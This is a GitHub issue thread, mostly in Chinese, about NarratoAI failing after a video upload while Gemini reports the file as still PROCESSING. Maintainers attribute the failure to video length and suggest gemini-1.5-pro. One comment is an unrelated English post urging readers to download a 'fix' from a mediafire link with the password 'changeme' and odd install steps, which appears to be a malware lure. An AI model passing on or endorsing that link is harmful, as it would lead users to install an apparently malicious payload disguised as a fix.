### ISSUE TITLE
视频上传成功了，但是一直无法进行下一步，控制台报错 

### ISSUE THREAD

**Issue by yeah2569** [linyqh/NarratoAI#19]
控制台输出 如下Debug信息，webui  | 2024-08-27 01:48:45 | DEBUG | "./app/services/llm.py:456": gemini_video2json - 视频当前状态(ACTIVE才可用): PROCESSING，最后就报错了

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by EasonRAY1307** [comment]
朋友你的api key 有做设置吗？

**Comment by yeah2569** [comment]
> 朋友你的api key 有做设置吗？

设置了，demo的是可以的，我自己上传的视频不行

**Comment by linyqh** [comment]
> 控制台输出 如下Debug信息，webui | 2024-08-27 01:48:45 | DEBUG | "./app/services/llm.py:456": gemini_video2json - 视频当前状态(ACTIVE才可用): PROCESSING，最后就报错了

如果自己的视频超10分钟，建议使用 gemini-1.5-pro 模型； 即使gemini官方宣称 gemini-1.5-flash 能够支持 1小时的视频长度，但实际使用下来，过长的视频文件似乎依然会报500错误

**Comment by yeah2569** [comment]
> > 控制台输出 如下Debug信息，webui | 2024-08-27 01:48:45 | DEBUG | "./app/services/llm.py:456": gemini_video2json - 视频当前状态(ACTIVE才可用): PROCESSING，最后就报错了
> 
> 如果自己的视频超10分钟，建议使用 gemini-1.5-pro 模型； 即使gemini官方宣称 gemini-1.5-flash 能够支持 1小时的视频长度，但实际使用下来，过长的视频文件似乎依然会报500错误

懂了，那估计就是我的视频太长了

**Comment by yeah2569** [comment]
应该是视频太长了

**Comment by 151819880412** [comment]
请问一下上传google cloud是怎么解决的？
是需要去绑定信用卡吗

**Comment by EasonRAY1307** [comment]
有机会求帮忙
